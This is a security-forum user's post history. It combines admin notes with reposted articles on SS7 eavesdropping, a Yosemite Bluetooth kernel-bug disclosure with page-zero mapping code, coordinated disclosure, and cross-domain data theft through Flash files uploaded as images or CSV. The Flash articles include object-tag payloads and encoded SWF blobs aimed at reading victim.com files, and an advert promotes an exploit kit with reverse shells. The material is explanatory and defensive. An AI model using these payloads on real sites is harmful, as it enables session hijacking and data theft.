-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
Da. Incerc sa le mut si nu imi iese. E posibil sa apara urat de tot paginile
-
Am pus sa poti da Like SAU Dislike, nu ambele. Sa vad ce imi mai permite plugin-ul. "Unlike" pare sa fie doar in versiunea Pro.
-
[h=3]Mobile eavesdropping via SS7 and first reaction from telecoms[/h] Mobile network operators and manufacturers finally said some words about vulnerabilities in the SS7 technology that allow an intruder to perform subscriber’s tracking, conversation tapping and other serious attacks. We reported some of these vulnerabilities and attack schemes in May 2014 at Positive Hack Days IV as well as here in our blog. In December 2014, these SS7 threats were brought to public attention again, at the Chaos Communication Congress in Hamburg, where German researchers showed some new ways mobile phone calls using SS7. The research have included more than 20 networks worldwide, including T-Mobile in the United States. Meanwhile, the Washington Post reports that GSMA did not respond to queries seeking comment about the vulnerabilities in question. For the Post’s article in August on location tracking systems that use SS7, GSMA officials acknowledged problems with the network and said it was due to be replaced over the next decade because of a growing list of security and technical issues. The reply from T-Mobile was more abstract: “T-Mobile remains vigilant in our work with other mobile operators, vendors and standards bodies to promote measures that can detect and prevent these attacks." We also found the first official reaction from Huawei: Huawei has obtained the vulnerability information from open channels and launched technical analysis. Again, not too much said. But it’s better that nothing, considering the fact that SS7 problem is not new: it’s traced back to the seventies of the last century. In the early two thousands SIGTRAN specification was developed; it allowed transferring SS7 messages over IP networks. Security flaws of upper levels of SS7 protocols were still presented. The telecom engineers had been alerting that subscriber locating and fraud schemes using SS7 are possible, since 2001. For obvious reasons, providers didn't want the public to know about these vulnerabilities. However, it's believed that law enforcement agencies used SS7 vulnerabilities to spy on mobile networks for years. In 2014, it was found out that there are private companies providing a whole range of the above-mentioned services to anyone who wants. For example, this is how the SkyLock service provided by the American company Verint works: Washington Post notes that Verint do not use their capabilities against American and Israeli citizens, "but several similar systems, marketed in recent years by companies based in Switzerland, Ukraine and elsewhere, likely are free of such limitations". The more detailed description of this tracking technology and other SS7 attacks could be found in our report “Vulnerabilities in SS7 mobile networks” published in 2014. Data presented in this report were gathered by Positive Technologies experts in 2013 and 2014 during consulting on security analysis for several large mobile operators and are supported by practical researches of detected vulnerabilities and features of the SS7 network. During testing network security, Positive Technologies experts managed to perform such attacks as discovering a subscriber's location, disrupting a subscriber's availability, SMS interception, USSD request forgery (and transfer of funds as a result of this attack), voice call redirection, conversation tapping, disrupting a mobile switch's availability. The testing revealed that even the top 10 telecom companies are vulnerable to these attacks. Moreover, there are known cases of performance of such attacks on the international level, including discovering a subscriber's location and tapping conversations from other countries. Common features of these attacks: The intruder doesn't need sophisticated equipment. We used a common computer with OS Linux and SDK for generating SS7 packets, which is publicly available on the web. Upon performing one attack using SS7 commands, the intruder is able to perform the rest attacks by using the same methods. For instance, if the intruder managed to determine a subscriber's location, only one step left for SMS interception, transfer of funds etc. Attacks are based on legitimate SS7 messages: you cannot just filter messages, because it may have negative influence over the whole service. An alternative way to solve the problem is presented in the final clause of this research. Read the full PDF report here. ?????: Positive Research ?? 12:21 AM Sursa: http://blog.ptsecurity.com/2015/01/mobile-eavesdropping-via-ss7-and-first.html
-
Foloseam vbSEO, dar nu mi-a placut niciodata: vBSEO’s Vulnerability Leads to Remote Code Execution | Sucuri Blog Am pus 3 noi plugin-uri de la DragonBye: - Advanced Post Thanks / Like (inlocuitor pentru Like-urile din vbSEO) - Advanced User Tagging (era pus de ceva timp, i-am facut update) - DragonByte SEO (inlocuitor pentru vbSEO, structura link-urilor asemanatoare) Asadar pot sa apara o gramada de probleme, atat de functionalitate cat si de securitate. Daca gasiti o problema o puteti posta sau imi dati PM. Pentru XSS se primeste VIP. Pentru altceva, discutam.
-
Doar la Likes e problema, ma ocup de asta. Pana diseara sper sa fie ok.
-
WoltLab Burning Board 4.0 Tapatalk Cross Site Scripting & Open Redirect
Nytro replied to Aerosol's topic in Exploituri
Exact astea au fost raportate de persoane de pe forum pentru Talpashit pentru vBulletin 4. Astia sunt retardati. -
Test. @Nytro @Nytrofdgdfgfdg
-
IDA Pro 6.6 + Hex Rays 2.0 (x86/x64/arm)
Nytro replied to old66's topic in Reverse engineering & exploit development
Why do you need 6.7? Here is the changelog: https://www.hex-rays.com/products/ida/6.7/ -
V-am pus o noua tema de mobile. Ar trebui sa puteti intra mai usor acum.
-
IDA Pro 6.6 + Hex Rays 2.0 (x86/x64/arm)
Nytro replied to old66's topic in Reverse engineering & exploit development
E perfecta prima versiune. Hex-Rays face toti banii. -
IDA Pro 6.6 + Hex Rays 2.0 (x86/x64/arm)
Nytro replied to old66's topic in Reverse engineering & exploit development
Tested, merge, decompiler pentru x64. Thanks! -
Point, Click, Root. More than 300+ exploits! Presented in Black Hat 2014 Version 3.3.3 More than 300+ exploits Military grade professional security tool Exploit Pack comes into the scene when you need to execute a pentest in a real environment, it will provide you with all the tools needed to gain access and persist by the use of remote reverse agents. Remote Persistent Agents Reverse a shell and escalate privileges Exploit Pack will provide you with a complete set of features to create your own custom agents, you can include exploits or deploy your own personalized shellcodes directly into the agent. Write your own Exploits Use Exploit Pack as a learning platform Quick exploit development, extend your capabilities and code your own custom exploits using the Exploit Wizard and the built-in Python Editor moded to fullfill the needs of an Exploit Writer. Sursa: Exploit Pack
-
ExecutedProgramsList [h=4]Description[/h] ExecutedProgramsList is a simple tool that displays a list of programs and batch files that you previously executed on your system. For every program, ExecutedProgramsList displays the .exe file, the created/modified time of the .exe file, and the current version information of the program (product name, product version, company name) if it's available. For some of the programs, the last time execution time of the program is also displayed. [h=4]System Requirements[/h] This utility works on any version of Windows, starting from Windows XP and up to Windows 8. Both 32-bit and 64-bit systems are supported. [h=4]Data Source[/h] The list of previously executed programs is collected from the following data sources: Registry Key: HKEY_CURRENT_USER\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache Registry Key: HKEY_CURRENT_USER\Microsoft\Windows\ShellNoRoam\MUICache Registry Key: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted Registry Key: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store Windows Prefetch folder (C:\Windows\Prefetch) Sursa: ExecutedProgramsList - Shows programs previously executed on your system
-
[h=1]Crypto200 with The POODLE Attack[/h] Tetcon is one of the biggest security conferences in Viet Nam. There are various talks which speak both in Vietnamese and English. In this year, the first time, organizers decided to host a hacking challenge – Capture The Flag (CTF) ! While CTF was running, I solved 3 tasks, such as: getit, next and “Who let the dog out?”. First two tasks is not quite hard. You should try it yourself. In this post, I would like to talk about “Who let the dog out?”. It’s about cryptography attack. In particular, it is the POODLE attack. And the author of this task is Thai Duong (thaidn), one of experts who find out this attack. Download: [TetCON CTF 2015] Crypto200 with The POODLE Attack
-
Cryptography Exercises Contents 1 source coding 3 2 Caesar Cipher 4 3 Ciphertext-only Attack 5 4 Classification of Cryptosystems-Network Nodes 6 5 Properties of modulo Operation 10 6 Vernam Cipher 11 7 Public-Key Algorithms 14 8 Double Encryption 15 9 Vigenere Cipher and Transposition 16 10 Permutation Cipher 20 11 Substitution Cipher 21 12 Substitution + Transposition 25 13 Affine Cipher 27 14 Perfect Secrecy 28 15 Feistel Cipher 38 16 Block Cipher 45 17 Digital Encryption Standard (DES) 46 18 Primitive Element 53 19 Diffie-Hellman Key Exchange 54 20 Pohlig-Hellman a-symmetric Encryption 58 21 ElGamal 59 22 RSA System 61 23 Euclid’s algorithm 65 24 Protocol Failure 66 25 Complexity 67 26 Authentication 68 27 Protocols 71 28 Hash Functions 73 29 Cipher Modes 78 30 Pseudo Random Number Generators 79 31 Linear Feedback Shift Register 80 32 Challenge Response 87 33 Application of error correcting codes in biometric authentication 89 34 General Problems 91 Download: http://www.iem.uni-due.de/~vinck/crypto/problems-crypto.pdf
-
Analyzing Man-in-the-Browser (MITB) Attacks The Matrix is real and living inside your browser. How do you ask? In the form of malware that is targeting your financial institutions. Though, the machines creating this malware do not have to target the institution, rather your Internet browser. By changing what you see in the browser, the attackers now have the ability to steal any information that you enter and display whatever they choose. This has become known as the Man-in-the-Browser (MITB) attack. Download: https://www.sans.org/reading-room/whitepapers/forensics/analyzing-man-in-the-browser-mitb-attacks-35687
-
- 1
-
-
(This post is a joint work with @joystick, see also his blog here) Motivated by our previous findings, we performed some more tests on service IOBluetoothHCIController of the latest version of Mac OS X (Yosemite 10.10.1), and we found five additional security issues. The issues have been reported to Apple Security and, since the deadline we agreed upon with them expired, we now disclose details & PoCs for four of them (the last one was notified few days later and is still under investigation by Apple). All the issues are in class IOBluetoothHCIController, implemented in the IOBluetoothFamily kext (md5 e4123caff1b90b81d52d43f9c47fec8f). [h=3]Issue 1 (crash-issue1.c)[/h] Many callback routines handled by IOBluetoothHCIController blindly dereference pointer arguments without checking them. The caller of these callbacks, IOBluetoothHCIUserClient::SimpleDispatchWL(), may actually pass NULL pointers, that are eventually dereferenced. More precisely, every user-space argument handled by SimpleDispatchWL() consists of a value and a size field (see crash-issue1.c for details). When a user-space client provides an argument with a NULL value but a large size, a subsequent call to IOMalloc(size) fails, returning a NULL pointer that is eventually passed to callees, causing the NULL pointer dereference. The PoC we provide targets method DispatchHCICreateConnection(), but the very same approach can be used to cause a kernel crash using other callback routines (basically any other callback that receives one or more pointer arguments). At first, we ruled out this issue as a mere local DoS. However, as discussed here, Yosemite only partially prevents mapping the NULL page from user-space, so it is still possible to exploit NULL pointer dereferences to mount LPE attacks. For instance, the following code can be used to map page zero: Mac:tmp $ cat zeropage.c [TABLE] [TR] [TD][/TD] [TD]#include <mach/mach.h> #include <mach/mach_vm.h> #include <mach/vm_map.h> #include <stdio.h> int main(int argc, char **argv) { mach_vm_address_t addr = 0; vm_deallocate(mach_task_self(), 0x0, 0x1000); int r = mach_vm_allocate(mach_task_self(), &addr, 0x1000, 0); printf("%08llx %d\n", addr, r); *((uint32_t *)addr) = 0x41414141; printf("%08x\n", *((uint32_t *)addr)); } [/TD] [/TR] [/TABLE] Mac:tmp $ llvm-gcc -Wall -o zeropage{,.c} -Wl,-pagezero_size,0 -m32 Mac:tmp $ ./zeropage 00000000 0 41414141 Mac:tmp $ Trying the same without the -m32 flag results in the 64-bit Mach-O being blocked at load time by the OS with message "Cannot enforce a hard page-zero for ./zeropage" (unless you do it as "root", but then what’s the point?). [h=3]Issue 2 (crash-issue2.c)[/h] As shown in the screenshot below, IOBluetoothHCIController::BluetoothHCIChangeLocalName() is affected by an "old-school" stack-based buffer overflow, due to a bcopy(src, dest, strlen(src)) call where src is fully controlled by the attacker. To the best of our knowledge, this bug cannot be directly exploited due to the existing stack canary protection. However, it may still be useful to mount a LPE attack if used in conjunction with a memory leak vulnerability, leveraged to disclose the canary value. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Issue 2, a plain stack-based buffer overflow[/TD] [/TR] [/TABLE] [h=3]Issue 3 (crash-issue3.c)[/h] IOBluetoothHCIController::TransferACLPacketToHW() receives as an input parameter a pointer to an IOMemoryDescriptor object. The function carefully checks that the supplied pointer is non-NULL; however, regardless of the outcome of this test, it then dereferences the pointer (see the figure below, the attacker-controlled input parameter is stored in register r15). The IOMemoryDescriptor object is created by the caller (DispatchHCISendRawACLData()) using the IOMemoryDescriptor::withAddress() constructor. As this constructor is provided with a user-controlled value, it may fail and return a NULL pointer. See Issue 1 discussion regarding the exploitability of NULL pointer dereferences on Yosemite. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Issue 3, the module checks if r15 is NULL, but dereferences it anyway[/TD] [/TR] [/TABLE] [h=3]Issue 4 (lpe-issue1.c)[/h] In this case, the problem is due to a missing sanity check on the arguments of the following function: IOReturn BluetoothHCIWriteStoredLinkKey( uint32_t req_index, uint32_t num_of_keys, BluetoothDeviceAddress *p_device_addresses, BluetoothKey *p_bluetooth_keys, BluetoothHCINumLinkKeysToWrite *outNumKeysWritten); The first parameter, req_index, is used to find an HCI Request in the queue of allocated HCI Requests (thus this exploit requires first to fill this queue with possibly fake requests). The second integer parameter (num_of_keys) is used to calculate the total size of the other inputs, respectively pointed by p_device_addresses and p_bluetooth_keys. As shown in the screenshot below, these values are not checked before being passed to function IOBluetoothHCIController::SendHCIRequestFormatted(), which has the following prototype: IOReturn SendHCIRequestFormatted(uint32_t req_index, uint16_t inOpCode, uint64_t outResultsSize, void *outResultBuf, const char *inFormat, ...); [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Issue 4, an exploitable buffer overflow (click to enlarge)[/TD] [/TR] [/TABLE] The passed format string "HbbNN" will eventually cause size_of_addresses bytes to be copied from p_device_addresses to outResultBuf in reverse order (the 'N' format consumes two arguments, the first is a size, the second a pointer to read from). If the calculated size_of_addresses is big enough (i.e., if we provide a big enough num_of_keys parameter), the copy overflows outResultBuf, thrashing everything above it, including a number of function pointers in the vtable of a HCI request object. These pointers are overwritten with attacker-controlled data (i.e., those pointed by p_bluetooth_keys) and called before returning to userspace, thus we can divert the execution wherever we want. As a PoC, lpe-issue1.c exploits this bug and attempts to call a function located at the attacker-controller address 0x4141414142424242. Please note that the attached PoC requires some more tuning before it can cleanly return to user-space, since more than one vtable pointer is corrupted during the overflow and needs to be fixed with valid pointers. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Execution of our "proof-of-concept" exploit (Issue 4)[/TD] [/TR] [/TABLE] [h=3]Notes[/h] All the PoCs we provide in this post are not "weaponized", i.e., they do not contain a real payload, nor they attempt to bypass existing security features of Yosemite (e.g., kASLR and SMEP). If you’re interested in bypass techniques (as you probably are, if you made it here), Ian Beer of Google Project Zero covered pretty much all of it in a very thorough blog post. In this case, he used a leak in the IOKit registry to calculate kslide and defeat kASLR, while he used an in-kernel ROP-chain to bypass SMEP. More recently, @i0n1c posted here about how kASLR is fundamentally broken on Mac OS X at the moment. [h=3]Conclusions[/h] Along the last issue identified, we shared with Apple our conclusions on this kext: according to the issues we identified, we speculate there are many other crashes and LPE vulnerabilities in it. Ours, however, is just a best-effort analysis done in our spare time, and given the very small effort that took us to identify the vulnerabilities, we would suggest a serious security evaluation of the whole kext code. [h=3]Disclosure timeline[/h] 02/11: Notification of issues 1, 2 and 3. 23/11: No answer received from Apple, notification of issue 4. As no answer was received since the first contact, propose December 2 as possible disclosure date. 25/11: Apple answers requesting more time. We propose to move the disclosure date to January 12. 27/11: Apple accepts the new deadline. 05/12: Contact Apple asking for the status of the vulnerabilities. 06/12: Apple says they're still "investigating the issue". 23/12: Notification of a new issue (#5), proposing January 23 as a tentative disclosure date. 06/01: Apple asks for more time for issue #5. We propose to move the disclosure date to February 23. We remind our intention to disclose the 4 previous issues on January 12. 12/01: No answer from Apple, disclosing first 4 issues. Sursa: Roberto Paleari's blog: Time to fill OS X (Blue)tooth: Local privilege escalation vulnerabilities in Yosemite
-
A Call for Better Coordinated Vulnerability Disclosure Chris Betz 11 Jan 2015 6:49 PM For years our customers have been in the trenches against cyberattacks in an increasingly complex digital landscape. We’ve been there with you, as have others. And we aren’t going anywhere. Forces often seek to undermine and disrupt technology and people, attempting to weaken the very devices and services people have come to depend on and trust. Just as malicious acts are planned, so too are counter-measures implemented by companies like Microsoft. These efforts aim to protect everyone against a broad spectrum of activity ranging from phishing scams that focus on socially engineered trickery, to sophisticated attacks by persistent and determined adversaries. (And yes, people have a role to play – strong passwords, good policies and practices, keeping current to the best of your ability, detection and response, etc. But we’ll save those topics for another day). With all that is going on, this is a time for security researchers and software companies to come together and not stand divided over important protection strategies, such as the disclosure of vulnerabilities and the remediation of them. In terms of the software industry at large and each player’s responsibility, we believe in Coordinated Vulnerability Disclosure (CVD). This is a topic that the security technology profession has debated for years. Ultimately, vulnerability collaboration between researchers and vendors is about limiting the field of opportunity so customers and their data are better protected against cyberattacks. Those in favor of full, public disclosure believe that this method pushes software vendors to fix vulnerabilities more quickly and makes customers develop and take actions to protect themselves. We disagree. Releasing information absent context or a stated path to further protections, unduly pressures an already complicated technical environment. It is necessary to fully assess the potential vulnerability, design and evaluate against the broader threat landscape, and issue a “fix” before it is disclosed to the public, including those who would use the vulnerability to orchestrate an attack. We are in this latter camp. CVD philosophy and action is playing out today as one company - Google - has released information about a vulnerability in a Microsoft product, two days before our planned fix on our well known and coordinated Patch Tuesday cadence, despite our request that they avoid doing so. Specifically, we asked Google to work with us to protect customers by withholding details until Tuesday, January 13, when we will be releasing a fix. Although following through keeps to Google’s announced timeline for disclosure, the decision feels less like principles and more like a “gotcha”, with customers the ones who may suffer as a result. What’s right for Google is not always right for customers. We urge Google to make protection of customers our collective primary goal. Microsoft has long believed coordinated disclosure is the right approach and minimizes risk to customers. We believe those who fully disclose a vulnerability before a fix is broadly available are doing a disservice to millions of people and the systems they depend upon. Other companies and individuals believe that full disclosure is necessary because it forces customers to defend themselves, even though the vast majority take no action, being largely reliant on a software provider to release a security update. Even for those able to take preparatory steps, risk is significantly increased by publically announcing information that a cybercriminal could use to orchestrate an attack and assumes those that would take action are made aware of the issue. Of the vulnerabilities privately disclosed through coordinated disclosure practices and fixed each year by all software vendors, we have found that almost none are exploited before a “fix” has been provided to customers, and even after a “fix” is made publicly available only a very small amount are ever exploited. Conversely, the track record of vulnerabilities publicly disclosed before fixes are available for affected products is far worse, with cybercriminals more frequently orchestrating attacks against those who have not or cannot protect themselves. Another aspect of the CVD debate has to do with timing – specifically the amount of time that is acceptable before a researcher broadly communicates the existence of a vulnerability. Opinion on this point varies widely. Our approach and one that we have advocated others adopt, is that researchers work with the vendor to deliver an update that protects customers prior to releasing details of the vulnerability. There are certainly cases where lack of response from a vendor(s) challenges that plan, but still the focus should be on protecting customers. You can see our values in action through our own security experts who find and report vulnerabilities in many companies’ products, some of which we receive credit for, and many that are unrecognized publically. We don’t believe it would be right to have our security researchers find vulnerabilities in competitors’ products, apply pressure that a fix should take place in a certain timeframe, and then publically disclose information that could be used to exploit the vulnerability and attack customers before a fix is created. Responding to security vulnerabilities can be a complex, extensive and time-consuming process. As a software vendor this is an area in which we have years of experience. Some of the complexity in the timing discussion is rooted in the variety of environments that we as security professionals must consider: real world impact in customer environments, the number of supported platforms the issue exists in, and the complexity of the fix. Vulnerabilities are not all made equal nor according to a well-defined measure. And, an update to an online service can have different complexity and dependencies than a fix to a software product, decade old software platform on which tens of thousands have built applications, or hardware devices. Thoughtful collaboration takes these attributes into account. To arrive at a place where important security strategies protect customers, we must work together. We appreciate and recognize the positive collaboration, information sharing and results-orientation underway with many security players today. We ask that researchers privately disclose vulnerabilities to software providers, working with them until a fix is made available before sharing any details publically. It is in that partnership that customers benefit the most. Policies and approaches that limit or ignore that partnership do not benefit the researchers, the software vendors, or our customers. It is a zero sum game where all parties end up injured. Let’s face it, no software is perfect. It is, after all, made by human beings. Microsoft has a responsibility to work in our customers’ best interest to address security concerns quickly, comprehensively, and in a manner that continues to enable the vast ecosystem that provides technology to positively impact peoples’ lives. Software is organic, usage patterns and practices change, and new systems are built on top of products that test (and in some cases exceed) the limits of its original design. In many ways that’s the exciting part of software within the rapidly evolving world that we live in. Stating these points isn’t in any way an abdication of responsibility. It is our job to build the best possible software that we can, and to protect it continuously to the very best of our ability. We’re all in. Chris Betz Senior Director, MSRC Trustworthy Computing [Note: In our own CVD policy (available at microsoft.com/cvd), we do mention exceptions for cases in which we might release an advisory about a vulnerability in a third party’s software before an update is ready, including when the technical details have become publicly known, when there is evidence of exploitation of an unpatched vulnerability, and when the vendor fails to respond to requests for discussion.] Sursa: A Call for Better Coordinated Vulnerability Disclosure - MSRC - Site Home - TechNet Blogs
-
The pitfalls of allowing file uploads on your website These days a lot of websites allow users to upload files, but many don’t know about the unknown pitfalls of letting users (potential attackers) upload files, even valid files. What’s a valid file? Usually, a restriction would be on two parameters: The uploaded file extension The uploaded Content-Type. For example, the web application could check that the extension is “jpg” and the Content-Type “image/jpeg” to make sure it’s impossible to upload malicious files. Right? The problem is that plugins like Flash doesn’t care about extension and Content-Type. If a file is embedded using an <object> tag, it will be executed as a Flash file as long as the content of the file looks like a valid Flash file. But wait a minute! Shouldn’t the Flash be executed within the domain that embeds the file using the <object> tag? Yes and no. If a Flash file (bogus image file) is uploaded on victim.com and then embedded at attacker.com, the Flash file can execute JavaScript within the domain of attacker.com. However, if the Flash file sends requests, it will be allowed to read files within the domain of victim.com. This basically means that if a website allows file uploads without validating the content of the file, an attacker can bypass any CSRF protection on the website. The attack Based on these facts we can create an attack scenario like this: An attacker creates a malicious Flash (SWF) file The attacker changes the file extension to JPG The attacker uploads the file to victim.com The attacker embeds the file on attacker.com using an tag with type “application/x-shockwave-flash” The victim visits attacker.com, loads the file as embedded with the tag The attacker can now send and receive arbitrary requests to victim.com using the victims session The attacker sends a request to victim.com and extracts the CSRF token from the response A payload could look like this: <object style="height:1px;width:1px;" data="http://victim.com/user/2292/profilepicture.jpg" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=read&u=http://victim.com/secret_file.txt"></object> The fix The good news is that there’s a fairly easy way to prevent Flash from doing this. Flash won’t execute the file if it sends a Content-Disposition header like so: Content-Disposition: attachment; filename=”image.jpg” So if you allow file uploads or printing arbitrary user data in your service, you should always verify the contents as well as sending a Content-Disposition header where applicable. Another way to remediate issues like this is to host the uploaded files on a separate domain (like websiteusercontent.com). Other uses But the fun doesn’t stop at file uploads! Since the only requirements of this attack is that an attacker can control the data on a location of the target domain (regardless of Content-Type), there’s more than one way to perform this attack. One way would be to abuse a JSONP API. Usually, the attacker can control the output of a JSONP API endpoint by changing the callback parameter. However, if an attacker uses an entire Flash file as callback, we can use it just like we would use an uploaded file in this attack. A payload could look like this: <object style="height:1px;width:1px;" data="http://victim.com/user/jsonp?callback=CWS%07%0E000x%9C%3D%8D1N%C3%40%10E%DF%AE%8D%BDI%08%29%D3%40%1D%A0%A2%05%09%11%89HiP%22%05D%8BF%8E%0BG%26%1B%D9%8E%117%A0%A2%DC%82%8A%1Br%04X%3B%21S%8C%FE%CC%9B%F9%FF%AA%CB7Jq%AF%7F%ED%F2%2E%F8%01%3E%9E%18p%C9c%9Al%8B%ACzG%F2%DC%BEM%EC%ABdkj%1E%AC%2C%9F%A5%28%B1%EB%89T%C2Jj%29%93%22%DBT7%24%9C%8FH%CBD6%29%A3%0Bx%29%AC%AD%D8%92%FB%1F%5C%07C%AC%7C%80Q%A7Nc%F4b%E8%FA%98%20b%5F%26%1C%9F5%20h%F1%D1g%0F%14%C1%0A%5Ds%8D%8B0Q%A8L%3C%9B6%D4L%BD%5F%A8w%7E%9D%5B%17%F3%2F%5B%DCm%7B%EF%CB%EF%E6%8D%3An%2D%FB%B3%C3%DD%2E%E3d1d%EC%C7%3F6%CD0%09" type="application/x-shockwave-flash" allowscriptaccess="always" flashvars="c=alert&u=http://victim.com/secret_file.txt"></object> tl;dr: Send Content-Disposition headers for uploaded files and validate your JSONP callback names. Or put the uploaded files on a separate domain And like always, if you want to know if your website has issues like these, try a Detectify scan! That’s it for now. Written by: Mathias, Frans Sursa: Detectify Blog – The pitfalls of allowing file uploads on your...
-
Content-Type Blues Assuming an attacker can control the start of a CSV file served up by a web application, what damage could be done? The example PHP code below serves up a basic CSV file, but allows the user to control the column names. Note that the Content-Type header is at least set properly. <?php header('Content-Type: text/csv'); header('Content-Disposition: inline; filename=blah.csv'); header('Content-Length: ' . 20); echo $_GET["columnNames"] . "\r\n"; echo "1,2,3,4,5\r\n"; echo "data,we,do,not,control"; ?> Our first attempt might involve injecting in a XSS payload. http://target/csvServe.php?columnNames=a,b,c,d,e<html><body><script>alert(1)</script></body</html> This seems like a reasonable approach since the application accepts and uses the columnNames parameter without performing any input validation or output encoding. But, the browser, even our old friend IE, will not render the content as HTML due to the Content-Type header’s value (text/csv). Note that this would be exploitable if the Content-Type header was set to text/plain instead, because IE will perform content sniffing in that situation. Out of luck? Nope, just inject in an entire SWF file into the columnNames parameter. A SWF’s origin is the domain from which it was retrieved from, similar to a Java applet (uses IP addresses instead of domain names though), therefore a malicious page could embed a SWF, which originates from the target’s domain that could make arbitrary requests to the target domain and read the responses (steal sensitive data, defeat CSRF protections, and other generally nasty actions). But, what about the data in the CSV that we don’t control? The Flash Player will ignore the content following a well formed SWF and execute the SWF properly. The following JavaScript code snippet demonstrates this technique. Since both browsers and HTTP servers impose limits on the length of URLs, I would recommend writing the payload in ActionScript 2 using a command-line compiler like MTASC or an assembler like Flasm in order to craft a small SWF. Sadly, Flex is bloated, so mxmlc is not an option. <script> var flashvars = {}; var params = {}; var attributes = {}; var url="http://target/csvServe.php?columnNames=CWS%07%AA%01%00%00x%DADP%C1N%021%14%9C%ED%22-j0%21%24%EB%81%03z%E3%E2%1F%18XI%88%1E%607%C0%C1%8B%D9%ACP%91X%ECf%A9%01%BF%40N%1C%F7%E6%DD%CF%F1%8F%F0%B5K%E2%3BL%DFL%DA%E9%9B%B7%05%FF%05%82%0Chz%E8%B3%03U%AD%0A%AA%D8%23%E8%D6%9B%84%D4%C5I%12%A7%B3%B7t%21%D77%D3%0F%A3q%A8_%DA%0B%F1%EE%09gpJ%B2P%FA9U0%2FHr%AD%0Df%B9L%8D%9C%CA%AD%19%2C%A5%9A%C3P%87%7B%A9%94not%AE%E6%ED%2Bd%B96%DA%7Cf%12%ABt%F9%8E4%CB%10N%26%D2%C4%B9%CE%06%2A%5D%ACQ0%08%B4%1A%8Do%86%1FG%BC%96%93%F6%C2%0E%C9%3A%08Q%5C%83%3F2%80%B7%7D%02%2B%FF%83%60%DC%A6%11%BE%7BU%19%07%F6%28%09%1B%15%15%88%13Q%8D%BE%28ID%84%28%1F%11%F1%82%92%88%FD%B9%0D%EFw%C0V34%8F%B3%145%88Zi%8E%5E%14%15%17%E0v%13%AC%E2q%DF%8A%A7%B7%01%BA%FE%1D%B5%BB%16%B9%0C%A7%E1%A4%9F%0C%C3%87%11%CC%EBr%5D%EE%CA%A5uv%F6%EF%E0%98%8B%97N%82%B9%F9%FCq%80%1E%D1%3F%00%00%00%FF%FF%03%00%84%26N%A8"; swfobject.embedSWF(url, "content", "400", "200", "10.0.0", "expressInstall.swf", flashvars, params, attributes); </script> Ideally, web applications wouldn’t accept arbitrary content to build a CSV, but the Flash Player could also take steps to prevent this attack from occurring. The following improvements could be made, but will likely break some existing RIAs that fail to set the Content-Type header properly on their SWFs. 1) Refuse to play any SWF that does not have a correct MIME type (application/x-shockwave-flash). 2) Refuse to play any SWF that has erroneous data at the end of the file. Moral of the story: setting the content type properly is not a substitute for proper input validation. Sursa: Content-Type Blues | dead && end
-
Even uploading a JPG file can lead to Cross Domain Data Hijacking Even uploading a JPG file can lead to Cross Domain Data Hijacking (client-side attack)! Introduction: This post is going to introduce a new technique that has not been covered previously in other topics that are related to file upload attacks such as Unrestricted file upload and File in the hole. Update 1 (21/05/2014): It seems @fransrosen and @avlidienbrunn were quicker than me in publishing this technique! Yesterday they have published a very good blog post about this issue: Detectify Blog – The pitfalls of allowing file uploads on your... I highly recommend the readers to read the other blog post as well especially for its nice JSONP trick. I wanted to wait until end of this week to publish mine but now that this technique is already published, I release my post too. The draft version of this post and PoCs were ready before but I was not sure when I am going to publish this as it would affect a lot of websites; this was a note for bug bounty hunters! The only point of this blog post now is the way that I had looked at the issue initially. Update 2 (21/05/2014) Ok! People in twitter were very resourceful and reminded me that this was not in fact a new technique and some other bug bounty hunters are already using it in their advisories! I wish they had documented this properly before. The following links are related to this topic: Content-Type Blues | dead && end (Content-Type Blues) https://bounty.github.com/researchers/adob.html (Flash content-type sniffing) How safe is the file uploader? Imagine that there is a file uploader that properly validates the uploaded file’s extension by using a white-list method. This file uploader only allows a few non-dangerous extensions such as .jpg, .png, and .txt. Moreover, it checks the filename to not contain any non-alphanumeric characters! This seems to be a simple and a safe method to protect the server and its users if risks of file processors’ bugs and file inclusion attacks have already been accepted. What can possibly go wrong? This file uploader does not have any validation for the file’s content and therefore it is possible to upload a malicious file with a safe name and extension on the server. However, when the server is properly configured, this file cannot be run on the server. Moreover, the file will be sent to the client with an appropriate content-type such a text/plain or image/jpeg; as a result, an attacker cannot exploit a cross-site scripting issue by opening the uploaded file directly in the browser. Enforcing the content-type by using an OBJECT tag! If we could change the file’s content-type for the browsers, we would be able to exploit this issue! But nowadays this is not simply possible directly as this counts as a security issue for the browser… I knew straight away that the “OBJECT” tag has a “TYPE” attribute but I was not sure which content-types will force the browser to actually load the object instead of showing the contents (“OBJECT” tag can act as an IFrame). I have created a test file (located at Object content-type test) that loads the object tags with the different mime-types and the result is as follows (Java and Silverlight were not installed): “application/futuresplash”: load the file as a Flash object “application/x-shockwave-flash”: load the file as a Flash object “text/x-component”: only works in IE to load .htc files(?) “application/pdf” and a few others: load the file as a PDF object The result can be different with having different plugins installed. So I can load any uploaded file as a flash file. Now I can upload a malicious flash file into the victim’s server as a .JPG file, and then load it as flash file in my own website. Please note that there is no point for me to upload a flash file that is vulnerable to XSS as it would run under my website’s domain instead of the target. Exploitation I found out that the embedded flash can still communicate with its source domain without checking the cross-domain policy. This makes sense as the flash file belongs to the victim’s website actually. As a result, the flash file that has been uploaded as a .JPG file in the victim’s website can load important files of the victim’s website by using current user’s cookies; then, it can send this information to a JavaScript that is in the attacker’s website which has embedded this JPG file as a Flash file. The exploitation is like a CSRF attack, you need to send a malicious link to a user who is already logged-in in the victim’s website (it still counts as CSRF even if you are not logged-in but this is out the scope of this post). The malicious Flash should have already been uploaded in the victim’s website. If the uploader is vulnerable to a CSRF attack itself, an attacker can first upload a malicious Flash file and then use it to hijack the sensitive data of the user or perform further CSRF attacks. As a result, an attacker can collect valuable information that are in the response of different pages of the victim’s website such as users’ 